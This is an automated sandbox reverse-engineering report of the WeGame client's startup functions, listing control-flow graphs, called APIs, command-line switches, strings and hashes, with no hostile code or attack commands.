460dc3-460e27 call 420e50 ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAV45@@Z call 420c80 510->529 514->510 534 460c27-460c34 514->534 515->491 526 460b02-460b56 call 43df1b call 43f4bb call 43e231 515->526 526->491 528->529 533 460d12-460d59 call 420e50 call 456131 ?get_log_instance@base@@YAPAVILogger@1@XZ 528->533 547 460ee5-460f43 call 420e50 ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAV45@@Z call 420c80 529->547 548 460e2d-460e31 529->548 533->529 553 460d5b-460d68 533->553 534->510 545 460c36-460c8a call 43df1b call 43f4bb call 43e231 534->545 545->510 566 460f45-460f49 547->566 567 460f81-460ff1 call 420e50 ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAV45@@Z call 420c80 547->567 548->547 552 460e37-460e7e call 420e50 call 456131 ?get_log_instance@base@@YAPAVILogger@1@XZ 548->552 552->547 572 460e80-460e8d 552->572 553->529 564 460d6a-460dbe call 43df1b call 43f4bb call 43e231 553->564 564->529 566->567 571 460f4b-460f66 _stricmp 566->571 586 460ff7-461009 call 46729c 567->586 587 46107d-461179 call 464392 call 420e50 call 453fd5 call 45a637 ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ ?report@Qos@qos@adapt_for_imports@ierd_tgp@@QAE_NABUQos_data_base@234@W4Qos_occasion@234@@Z call 45d749 call 45c4dc call 420c80 * 8 567->587 576 460f6f-460f7a 571->576 577 460f68-460f6d 571->577 572->547 582 460e8f-460ee0 call 43df1b call 43f4bb call 43e231 572->582 578 460f7b-460f80 ?save_proxy_settings@client_helper@net@ierd_tgp@@YAXPBD@Z 576->578 577->578 578->567 582->547 586->587 596 46100b-461078 call 461579 call 421330 call 40bbd0 call 40f180 ?TaskBarPin@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@_N@Z call 40bbd0 * 2 586->596 587->386 596->587
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00460435
                                                                • GetCommandLineW.KERNEL32(000001A4,00459F62), ref: 00460446
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?), ref: 0046047B
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 00460482
                                                                • GetCommandLineW.KERNEL32(?), ref: 004604E9
                                                                • CommandLineToArgvW.SHELL32(00000000), ref: 004604EC
                                                                • wcscmp.API-MS-WIN-CRT-STRING-L1-1-0(00481394,00000000), ref: 00460524
                                                                • wcscmp.API-MS-WIN-CRT-STRING-L1-1-0(004815D0,00000000), ref: 00460538
                                                                • wcscmp.API-MS-WIN-CRT-STRING-L1-1-0(00481650,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0046054C
                                                                • wcscmp.API-MS-WIN-CRT-STRING-L1-1-0(00481658,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0046055C
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00460579
                                                                • wcscmp.API-MS-WIN-CRT-STRING-L1-1-0(00481650,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004605E4
                                                                • _wtoi.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00460601
                                                                • _wtoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000), ref: 00460627
                                                                • _wtoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000), ref: 0046064D
                                                                • _wtoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000), ref: 00460673
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004606AE
                                                                • ?open_web@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(?,http://ue.qq.com/mur/?a=survey&b=15087&c=1&d=15272af955762c32696995ddcabc396a,0000004D), ref: 00460737
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(00000001,00000000,00000000,http://ue.qq.com/mur/?a=survey&b=15087&c=1&d=15272af955762c32696995ddcabc396a,0000004D), ref: 0046075C
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00460786
                                                                • ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAV45@@Z.COMMON(?,?,?,/GameId,00000007), ref: 00460826
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,/GameId,00000007), ref: 00460889
                                                                • ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAV45@@Z.COMMON(?,?,?,/SkinName,00000009), ref: 0046094B
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,/SkinName,00000009), ref: 004609B4
                                                                • ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAV45@@Z.COMMON(?,?,?,/ChannelId,0000000A,?,/SkinName,00000009), ref: 00460A7F
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,/ChannelId,0000000A), ref: 00460AE8
                                                                • ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAV45@@Z.COMMON(?,0000000D,?,/LockPosition,0000000D,?,/ChannelId,0000000A,?,/SkinName,00000009), ref: 00460BB3
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,/LockPosition,0000000D), ref: 00460C1C
                                                                • ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAV45@@Z.COMMON(?,0000000D,?,/SourceId,00000009,?,/LockPosition,0000000D,?,/ChannelId,0000000A,?,/SkinName,00000009), ref: 00460CE7
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,/SourceId,00000009), ref: 00460D50
                                                                • ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAV45@@Z.COMMON(?,0000000D,?,/PromoteId,0000000A,?,/SourceId,00000009,?,/LockPosition,0000000D,?,/ChannelId,0000000A,?,/SkinName), ref: 00460E0F
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420E77
                                                                  • Part of subcall function 00456131: __EH_prolog3_catch_GS.LIBCMT ref: 00456138
                                                                  • Part of subcall function 00456131: ?set_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@@Z.COMMON(?,?,00000028), ref: 0045616F
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,/PromoteId,0000000A), ref: 00460E75
                                                                • ?report@Qos@qos@adapt_for_imports@ierd_tgp@@QAE_NABUQos_data_base@234@W4Qos_occasion@234@@Z.COMMON(?,00000001,00000001,00000000,00000000,http://ue.qq.com/mur/?a=survey&b=15087&c=1&d=15272af955762c32696995ddcabc396a,0000004D), ref: 0046076C
                                                                  • Part of subcall function 0043F4BB: __EH_prolog3_catch_GS.LIBCMT ref: 0043F4C2
                                                                • LocalFree.KERNEL32(00000000), ref: 0046117F
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                • ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAV45@@Z.COMMON(0000000D,0000000D,?,/Proxy,00000006,?,/PromoteId,0000000A,?,/SourceId,00000009,?,/LockPosition,0000000D,?,/ChannelId), ref: 00460F2B
                                                                • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,none), ref: 00460F5C
                                                                • ?save_proxy_settings@client_helper@net@ierd_tgp@@YAXPBD@Z.COMMON(?), ref: 00460F7B
                                                                • ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAV45@@Z.COMMON(0000000C,0000000D,?,/QUICKLAUNCH,0000000C,?,/Proxy,00000006,?,/PromoteId,0000000A,?,/SourceId,00000009,?,/LockPosition), ref: 00460FD9
                                                                • ?TaskBarPin@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@_N@Z.COMMON(00000000,00000001,?,0000000D,wegame.exe,?,?,?,?,/QUICKLAUNCH,0000000C,?,/Proxy,00000006,?,/PromoteId), ref: 0046105A
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(00000001,00000000,00000000,00000000), ref: 004610E0
                                                                • ?report@Qos@qos@adapt_for_imports@ierd_tgp@@QAE_NABUQos_data_base@234@W4Qos_occasion@234@@Z.COMMON(?,00000001,00000001,00000000,00000000,00000000), ref: 004610F0
                                                                  • Part of subcall function 0045D749: __EH_prolog3_GS.LIBCMT ref: 0045D753
                                                                  • Part of subcall function 0045D749: ?is_regular_file@filesystem@ierd_tgp@@YA_NABVpath@12@AAVerror_code@std@@@Z.COMMON(?,?,?,?,?,00000000,00000000,00000000), ref: 0045D812
                                                                  • Part of subcall function 0045D749: ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(0000000D,?,?,?,00000000,00000000,00000000), ref: 0045D824
                                                                  • Part of subcall function 0045D749: ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@AAVerror_code@std@@@Z.COMMON(00000000,?,0000000D,?,?,?,00000000,00000000,00000000), ref: 0045D83C
                                                                  • Part of subcall function 0045D749: ?copy_file@filesystem@ierd_tgp@@YAXABVpath@12@0W4copy_option@12@AAVerror_code@std@@@Z.COMMON(?,0000000A,00000001,?), ref: 0045D890
                                                                  • Part of subcall function 00420C80: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0043E0C9,85A35C35,?,?,?,00474220,000000FF,?,0043E01E,85A35C35,?,?,?,004741CF,000000FF), ref: 00420CC5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$?get_log_instance@base@@Logger@1@Sys_wrapper@common@ierd_tgp@@$?extract_op_from_cmd@D@2@@std@@0V45@@$wcscmp$_wtoi$CommandLineVerror_code@std@@@$?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@?report@D@2@@std@@H_prolog3_H_prolog3_catch_Qos@123@Qos@qos@adapt_for_imports@ierd_tgp@@Qos_data_base@234@Qos_occasion@234@@U?$char_traits@_V?$allocator@_V?$basic_string@_Vpath@12@W@std@@$?copy_file@filesystem@ierd_tgp@@?exists@filesystem@ierd_tgp@@?is_regular_file@filesystem@ierd_tgp@@?open_web@?parent_path@path@filesystem@ierd_tgp@@?save_proxy_settings@client_helper@net@ierd_tgp@@?set_cfg_by_path@common@ierd_tgp@@?u16to8@common@ierd_tgp@@ArgvD@2@@4@@D@2@@std@@@D@2@@std@@@2@@property_tree@boost@@@FreeH_prolog3LocalPin@TaskU?$less@V123@V12@V?$basic_ptree@Vpath@12@0W4copy_option@12@W@2@@std@@W@2@@std@@__invalid_parameter_noinfo_noreturn_stricmpmemmove
                                                                • String ID: %$/ChannelId$/GameId$/LockPosition$/PromoteId$/Proxy$/QUICKLAUNCH$/SkinName$/SourceId$CommandLineToArgvW failed$YES$[App]Command line:[{}]$[App]This is a restart from assistant.$[App]This is the start from install.$[App]This is the start from uninstall.$[App]setted channel_id(%s) into cfg, set_rs:%d$[App]setted game_id(%s) into cfg, set_rs:%d$[App]setted lock_position(%s) into cfg, set_rs:%d$[App]setted promote_id(%s) into cfg, set_rs:%d$[App]setted skin(%s) into cfg, set_rs:%d$[App]setted source_id(%s) into cfg, set_rs:%d$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp$http://ue.qq.com/mur/?a=survey&b=15087&c=1&d=15272af955762c32696995ddcabc396a$initial.bind_by_game.channel_id$initial.bind_by_game.game_id$initial.bind_by_game.lock_position$initial.bind_by_game.skin$initial.bind_by_game.source_id$none$promote.netbar_promote.promote_id$wegame.exe
                                                                • API String ID: 2162744675-3570341653
                                                                • Opcode ID: 91d8ec46f779b043c992a44baca1edf82e4f8d84a87631d5e10cf3582d87064b
                                                                • Instruction ID: 8b0b7b16f85759ac185797cd59d15957763333e32cfc2a695004acddb4880b82
                                                                • Opcode Fuzzy Hash: 91d8ec46f779b043c992a44baca1edf82e4f8d84a87631d5e10cf3582d87064b
                                                                • Instruction Fuzzy Hash: B582D670D01258EEDB11EBA5CC41BEEBBB4AF15304F64409FE04577282EB785B49CB9A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00459E8B Relevance: 80.8, APIs: 32, Strings: 14, Instructions: 329libraryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 633 459e8b-459f64 call 46e476 ??0Application@common@ierd_tgp@@QAE@HQAPAD_NKK1ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z call 45abb2 GetTickCount ?get_session_id@Application@common@ierd_tgp@@QAE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ call 45f813 call 420c80 OutputDebugStringW call 463c1e call 43ef54 call 43e851 call 46042b 650 459f66-459f6f ?get_log_instance@base@@YAPAVILogger@1@XZ 633->650 651 459fce-45a083 call 45d9db ?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD@Z CreateEventA ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ ?get_quick_login_uin@common@ierd_tgp@@YAKXZ call 45a68d ?report@Qos@qos@adapt_for_imports@ierd_tgp@@QAE_NABUQos_data_base@234@W4Qos_occasion@234@@Z call 45c4dc ?get_exe_path_ex@Application@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ call 40bbd0 ??_0path@filesystem@ierd_tgp@@QAEAAV012@PB_W@Z PathFileExistsW 633->651 653 459f71-459f7e 650->653 654 459fc0-459fc9 ?exit_app@Application@common@ierd_tgp@@QAEXH@Z 650->654 671 45a085-45a0ba LoadLibraryW call 461514 ?get_client_id@util_client_info@ierd_tgp@@YAHXZ call 451755 call 45170b 651->671 672 45a0bd-45a0ef call 40bbd0 ?stamp_point@@YAXPBD@Z call 4614bd ?stamp_point@@YAXPBD@Z ?get_log_instance@base@@YAPAVILogger@1@XZ 651->672 653->654 662 459f80-459fbb call 43df1b call 43f4bb call 43e231 653->662 655 45a2db-45a2e6 call 46e420 654->655 662->654 671->672 682 45a0f1-45a0fe 672->682 683 45a140-45a166 ?stamp_point@@YAXPBD@Z call 464e84 ?stamp_point@@YAXPBD@Z ?get_log_instance@base@@YAPAVILogger@1@XZ 672->683 682->683 691 45a100-45a13b call 43df1b call 43f4bb call 43e231 682->691 689 45a1b7-45a1cc ?get_comp_mgr_instance@common@ierd_tgp@@YAAAVComponent_mgr@12@XZ ?init@Component_mgr@common@ierd_tgp@@QAE_NXZ ?get_log_instance@base@@YAPAVILogger@1@XZ 683->689 690 45a168-45a175 683->690 693 45a21d-45a257 ?get_comp_mgr_instance@common@ierd_tgp@@YAAAVComponent_mgr@12@XZ ?inited@Component_mgr@common@ierd_tgp@@QAEXXZ call 461c31 ?Init@WndMsgReceiver@Tenio@@QAE_NPBD@Z call 442c83 689->693 694 45a1ce-45a1db 689->694 690->689 698 45a177-45a1b2 call 43df1b call 43f4bb call 43e231 690->698 691->683 707 45a25c-45a260 693->707 694->693 705 45a1dd-45a218 call 43df1b call 43f4bb call 43e231 694->705 698->689 705->693 712 45a271-45a2c8 ?PushAsyncTask@common@ierd_tgp@@YAXV?$function@$$A6AXXZ@std@@K@Z GetTickCount call 463c35 707->712 713 45a262-45a26a 707->713 722 45a2cf-45a2d6 call 420c80 712->722 723 45a2ca call 43f26a 712->723 713->712 716 45a26c 713->716 716->712 722->655 723->722
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00459E95
                                                                • ??0Application@common@ierd_tgp@@QAE@HQAPAD_NKK1ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(?,?,?,?,?,?,?,000000B4), ref: 00459EDC
                                                                  • Part of subcall function 0045ABB2: __EH_prolog3.LIBCMT ref: 0045ABB9
                                                                  • Part of subcall function 0045ABB2: ??0WndMsgReceiver@Tenio@@QAE@XZ.COMMON(00000004,00459EF0,?,?,?,?,?,?,?,000000B4), ref: 0045ABC3
                                                                • GetTickCount.KERNEL32 ref: 00459F0F
                                                                • ?get_session_id@Application@common@ierd_tgp@@QAE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?), ref: 00459F21
                                                                  • Part of subcall function 0045F813: __EH_prolog3_catch_GS.LIBCMT ref: 0045F81A
                                                                  • Part of subcall function 0045F813: ?stamp_point@@YAXPBD@Z.COMMON(CrashReportLoaderInit begin,0000007C,00459F30,00000000,?), ref: 0045F824
                                                                  • Part of subcall function 0045F813: ?get_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N@Z.COMMON(?,?,00000000,log,00000003,?,?,?,?,?,?,?,?,?,0000007C,00459F30), ref: 0045F86A
                                                                  • Part of subcall function 0045F813: ?is_static_detail_log@common@ierd_tgp@@YA_NXZ.COMMON(?), ref: 0045F8EF
                                                                  • Part of subcall function 0045F813: ?GetLastLoginedWegameId@common@ierd_tgp@@YAIXZ.COMMON(?), ref: 0045F8FB
                                                                  • Part of subcall function 0045F813: SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045F920
                                                                  • Part of subcall function 0045F813: ?get_client_version_type@overseas@ierd_tgp@@YAHXZ.COMMON(?,?,?,?,00459F30,00000000,?), ref: 0045F92C
                                                                  • Part of subcall function 0045F813: SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045F94F
                                                                  • Part of subcall function 0045F813: ?Instance@CrashReportLoader@crash_report@@SAAAV12@XZ.ADAPT_FOR_IMPORTS ref: 0045F975
                                                                • OutputDebugStringW.KERNEL32(Tenio Initialize!,?), ref: 00459F42
                                                                  • Part of subcall function 0043EF54: __EH_prolog3.LIBCMT ref: 0043EF5B
                                                                  • Part of subcall function 0043E851: __EH_prolog3_GS.LIBCMT ref: 0043E858
                                                                  • Part of subcall function 0043E851: ?StartThread@CThread@@QAEHPAXH@Z.COMMON(00000000,00000000,00000050), ref: 0043E861
                                                                  • Part of subcall function 0043E851: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000000,00000000,00000050), ref: 0043E86A
                                                                  • Part of subcall function 0046042B: __EH_prolog3_GS.LIBCMT ref: 00460435
                                                                  • Part of subcall function 0046042B: GetCommandLineW.KERNEL32(000001A4,00459F62), ref: 00460446
                                                                  • Part of subcall function 0046042B: ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?), ref: 0046047B
                                                                  • Part of subcall function 0046042B: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 00460482
                                                                  • Part of subcall function 0046042B: GetCommandLineW.KERNEL32(?), ref: 004604E9
                                                                  • Part of subcall function 0046042B: CommandLineToArgvW.SHELL32(00000000), ref: 004604EC
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 00459F66
                                                                • ?exit_app@Application@common@ierd_tgp@@QAEXH@Z.COMMON(00000065), ref: 00459FC4
                                                                • ?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD@Z.COMMON(?,31F73356-9B60-4B52-9FF0-F27E3A9BBEC2), ref: 00459FDE
                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,?), ref: 00459FF8
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON ref: 0045A001
                                                                • ?get_quick_login_uin@common@ierd_tgp@@YAKXZ.COMMON(00000000,00000000), ref: 0045A00C
                                                                • ?report@Qos@qos@adapt_for_imports@ierd_tgp@@QAE_NABUQos_data_base@234@W4Qos_occasion@234@@Z.COMMON(00000000,00000001,00000000,00000000,00000000,00000000), ref: 0045A02B
                                                                • ?get_exe_path_ex@Application@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0045A040
                                                                • ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0045A050
                                                                • ??_0path@filesystem@ierd_tgp@@QAEAAV012@PB_W@Z.COMMON(host_mgr.dll,?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0045A06A
                                                                • PathFileExistsW.SHLWAPI(?,host_mgr.dll,?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0045A07B
                                                                • LoadLibraryW.KERNEL32(host_mgr.dll), ref: 0045A086
                                                                • ?get_client_id@util_client_info@ierd_tgp@@YAHXZ.COMMON ref: 0045A098
                                                                • ?stamp_point@@YAXPBD@Z.COMMON(gen_all_components), ref: 0045A0CE
                                                                • ?stamp_point@@YAXPBD@Z.COMMON(gen_all_components end), ref: 0045A0E0
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0045A0E6
                                                                • ?stamp_point@@YAXPBD@Z.COMMON(warming_up), ref: 0045A145
                                                                • ?stamp_point@@YAXPBD@Z.COMMON(warming_up end), ref: 0045A157
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0045A15D
                                                                • ?get_comp_mgr_instance@common@ierd_tgp@@YAAAVComponent_mgr@12@XZ.COMMON ref: 0045A1B7
                                                                • ?init@Component_mgr@common@ierd_tgp@@QAE_NXZ.COMMON ref: 0045A1BE
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0045A1C3
                                                                • ?get_comp_mgr_instance@common@ierd_tgp@@YAAAVComponent_mgr@12@XZ.COMMON ref: 0045A21D
                                                                • ?inited@Component_mgr@common@ierd_tgp@@QAEXXZ.COMMON ref: 0045A224
                                                                • ?Init@WndMsgReceiver@Tenio@@QAE_NPBD@Z.COMMON(00000000), ref: 0045A234
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                  • Part of subcall function 0043F4BB: __EH_prolog3_catch_GS.LIBCMT ref: 0043F4C2
                                                                • ?PushAsyncTask@common@ierd_tgp@@YAXV?$function@$$A6AXXZ@std@@K@Z.COMMON ref: 0045A2A0
                                                                • GetTickCount.KERNEL32 ref: 0045A2A8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$?get_log_instance@base@@Logger@1@$?stamp_point@@$Application@common@ierd_tgp@@D@2@@std@@$CommandH_prolog3H_prolog3_Line$?get_comp_mgr_instance@common@ierd_tgp@@Component_mgr@12@Component_mgr@common@ierd_tgp@@CountH_prolog3_catch_Receiver@SimpleString::operator=Tenio@@TickV12@$??_0path@filesystem@ierd_tgp@@?exit_app@?get_cfg_by_path@common@ierd_tgp@@?get_client_id@util_client_info@ierd_tgp@@?get_client_version_type@overseas@ierd_tgp@@?get_coexist_name@util_multi_instance@ierd_tgp@@?get_exe_path_ex@?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@?get_quick_login_uin@common@ierd_tgp@@?get_session_id@?init@?inited@?is_static_detail_log@common@ierd_tgp@@?parent_path@path@filesystem@ierd_tgp@@?report@?u16to8@common@ierd_tgp@@ArgvAsyncCrashCreateD@2@@4@@D@2@@std@@@D@2@@std@@@2@@property_tree@boost@@_DebugEventExistsFileId@common@ierd_tgp@@Init@Instance@LastLibraryLoadLoader@crash_report@@LoginedOutputPathPushQos@123@Qos@qos@adapt_for_imports@ierd_tgp@@Qos_data_base@234@Qos_occasion@234@@ReportStartStringTask@common@ierd_tgp@@Thread@Thread@@U?$char_traits@_U?$less@V012@V123@V?$allocator@_V?$basic_ptree@V?$basic_string@_V?$function@$$Vpath@filesystem@3@W@2@@std@@W@std@@WegameZ@std@@
                                                                • String ID: 31F73356-9B60-4B52-9FF0-F27E3A9BBEC2$Tenio Initialize!$[main]comp inted$[main]exiting app started from install$[main]init comp$[main]warming_up$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp$gen_all_components$gen_all_components end$host_mgr.dll$initalize$set_client_info$warming_up$warming_up end
                                                                • API String ID: 388799878-509984740
                                                                • Opcode ID: 97bc40a33a6632bdc5683f6e82ccad9f35b816946132d78871e67a7d2a524c8b
                                                                • Instruction ID: d37aa05634a9d5d7ef2784c77ede07235e361d383fdd363fa9021b3e5bcef666
                                                                • Opcode Fuzzy Hash: 97bc40a33a6632bdc5683f6e82ccad9f35b816946132d78871e67a7d2a524c8b
                                                                • Instruction Fuzzy Hash: F7C1C130E01344AACB10EBA5CC46BDD7BB49F15308F14449EF8456B2C2DBBC9E48CB9A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0045F9D2 Relevance: 54.6, APIs: 24, Strings: 7, Instructions: 336fileCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
